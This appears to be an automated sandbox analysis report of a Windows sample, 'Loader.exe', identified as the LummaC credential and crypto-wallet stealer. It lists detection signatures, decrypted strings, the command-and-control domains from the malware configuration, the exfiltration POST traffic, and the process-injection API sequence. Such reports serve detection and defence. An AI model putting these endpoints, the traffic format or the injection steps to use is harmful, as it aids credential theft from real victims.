Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1541479
MD5:c92baaa9c4217759880a0ff0904695d9
SHA1:3902c5a7a6e557ab736d2b0e65c55f3f8b5a7b7b
SHA256:c72d1af1710785874f9c4bb686c4b7dfb89de050fb2c189898432247d8cfe386
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 7224 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: C92BAAA9C4217759880A0FF0904695D9)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["activedomest.sbs", "definitib.sbs", "withdrwblon.cyou", "elaboretib.sbs", "offybirhtdi.sbs", "mediavelk.sbs", "ostracizez.sbs", "strikebripm.sbs", "arenbootk.sbs"], "Build id": "HpOoIh--@qjwo1"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Loader.exe PID: 7224JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: aspnet_regiis.exe PID: 7388JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: aspnet_regiis.exe PID: 7388JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 7388JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T21:51:08.218465+020020546531A Network Trojan was detected192.168.2.749699188.114.96.3443TCP
              2024-10-24T21:51:09.491651+020020546531A Network Trojan was detected192.168.2.749700188.114.96.3443TCP
              2024-10-24T21:51:20.582900+020020546531A Network Trojan was detected192.168.2.749736188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T21:51:08.218465+020020498361A Network Trojan was detected192.168.2.749699188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T21:51:09.491651+020020498121A Network Trojan was detected192.168.2.749700188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T21:51:17.453106+020020480941Malware Command and Control Activity Detected192.168.2.749720188.114.96.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 5.2.Loader.exe.6d7f4000.5.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["activedomest.sbs", "definitib.sbs", "withdrwblon.cyou", "elaboretib.sbs", "offybirhtdi.sbs", "mediavelk.sbs", "ostracizez.sbs", "strikebripm.sbs", "arenbootk.sbs"], "Build id": "HpOoIh--@qjwo1"}
              Source: C:\Users\user\AppData\Roaming\msvcp110.dllReversingLabs: Detection: 63%
              Source: Loader.exeReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
              Source: Loader.exeJoe Sandbox ML: detected
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: offybirhtdi.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: activedomest.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: arenbootk.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: mediavelk.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: definitib.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: elaboretib.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: strikebripm.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: ostracizez.sbs
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: withdrwblon.cyou
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7E4D44 FindFirstFileExW,5_2_6D7E4D44

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49720 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 188.114.96.3:443
              Source: Malware configuration extractorURLs: activedomest.sbs
              Source: Malware configuration extractorURLs: definitib.sbs
              Source: Malware configuration extractorURLs: withdrwblon.cyou
              Source: Malware configuration extractorURLs: elaboretib.sbs
              Source: Malware configuration extractorURLs: offybirhtdi.sbs
              Source: Malware configuration extractorURLs: mediavelk.sbs
              Source: Malware configuration extractorURLs: ostracizez.sbs
              Source: Malware configuration extractorURLs: strikebripm.sbs
              Source: Malware configuration extractorURLs: arenbootk.sbs
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12845Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1135Host: withdrwblon.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: withdrwblon.cyou
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: withdrwblon.cyou
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423075609.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373823973.0000000005950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/
              Source: aspnet_regiis.exe, 00000008.00000003.1373852192.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/Co
              Source: aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/api
              Source: aspnet_regiis.exe, 00000008.00000003.1393784209.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423519992.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/api(w
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/apie
              Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/apied
              Source: aspnet_regiis.exe, 00000008.00000003.1392151745.00000000036AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/apih
              Source: aspnet_regiis.exe, 00000008.00000003.1348748371.0000000005958000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/apiqpv
              Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/apixi
              Source: aspnet_regiis.exe, 00000008.00000003.1373056224.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1391970997.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373694057.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/w
              Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou/x_
              Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://withdrwblon.cyou:443/api
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2

              System Summary

              barindex
              Source: Loader.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C45A0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,CreateProcessW,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,5_2_6D7C45A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C0A10 GetModuleHandleW,NtQueryInformationProcess,5_2_6D7C0A10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C45A05_2_6D7C45A0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BEA305_2_6D7BEA30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C0A105_2_6D7C0A10
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D05505_2_6D7D0550
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D2D305_2_6D7D2D30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D25105_2_6D7D2510
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CBD005_2_6D7CBD00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CD5005_2_6D7CD500
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7B25D05_2_6D7B25D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7B6DC05_2_6D7B6DC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C15C05_2_6D7C15C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D4DA05_2_6D7D4DA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DCD905_2_6D7DCD90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D1D905_2_6D7D1D90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BB4605_2_6D7BB460
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D94505_2_6D7D9450
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D3C005_2_6D7D3C00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BCCE05_2_6D7BCCE0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CA4B05_2_6D7CA4B0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CDCB05_2_6D7CDCB0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DBC905_2_6D7DBC90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D77605_2_6D7D7760
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BD7505_2_6D7BD750
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BFF005_2_6D7BFF00
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DAFF05_2_6D7DAFF0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CB7C05_2_6D7CB7C0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CCFA05_2_6D7CCFA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C27805_2_6D7C2780
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DB6705_2_6D7DB670
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7CE6605_2_6D7CE660
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D16505_2_6D7D1650
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DA6405_2_6D7DA640
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D5E305_2_6D7D5E30
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D0E205_2_6D7D0E20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7B96E05_2_6D7B96E0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7BAED05_2_6D7BAED0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7DBE905_2_6D7DBE90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D6E905_2_6D7D6E90
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D29505_2_6D7D2950
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7C11205_2_6D7C1120
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7EB1B55_2_6D7EB1B5
              Source: C:\Users\user\Desktop\Loader.exeCode function: 5_2_6D7D91A05_2_6D7D91A0
